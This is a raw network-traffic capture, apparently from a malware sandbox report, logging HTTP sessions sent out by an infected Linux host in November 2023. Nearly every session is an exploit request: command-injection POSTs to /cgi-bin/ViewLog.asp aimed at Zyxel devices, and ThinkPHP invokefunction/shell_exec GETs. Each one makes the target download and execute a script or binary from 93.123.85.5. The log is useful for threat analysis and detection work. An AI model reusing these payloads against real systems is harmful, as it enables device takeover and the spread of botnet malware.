                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              778192.168.2.234710062.29.45.1278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.559262037 CET15155OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              779192.168.2.235920495.209.163.898080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.572846889 CET15156OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              78192.168.2.235791694.110.138.378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.071288109 CET2701OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              780192.168.2.235949231.44.143.1258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.581948996 CET15157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              781192.168.2.233886295.100.88.22780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.774271965 CET15195OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:03.152395964 CET15294INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 66 35 38 36 34 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 34 30 32 26 23 34 36 3b 65 39 63 32 34 63 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;df58645f&#46;1699910402&#46;e9c24cf</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              782192.168.2.234173462.150.143.2498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.911068916 CET15286OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.300045967 CET15299INHTTP/1.1 302 Found
                                                              Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              783192.168.2.236019088.133.160.23080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.466392994 CET15302OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              784192.168.2.233341888.22.70.2080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.501971006 CET15302OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:03.856592894 CET15340INHTTP/1.1 404 Not Found
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              785192.168.2.235209285.201.193.1738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.614564896 CET15304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.943942070 CET15369INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:20:03 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              786192.168.2.234357831.136.76.898080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.625549078 CET15305OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:04.645284891 CET15427OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.660886049 CET15687OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.820514917 CET16213OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.011276007 CET17288OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.137145996 CET19264OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668781996 CET20704OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              787192.168.2.236057694.120.152.2378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.637319088 CET15305OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              788192.168.2.233636294.120.19.2488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:03.646282911 CET15306OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              789192.168.2.234141262.60.144.2408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:04.738264084 CET15512OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.788885117 CET15711OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.289227962 CET15799INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              Cache-Control: private
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 22:20:05 GMT


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              79192.168.2.233359294.198.129.568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.086297989 CET2701OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
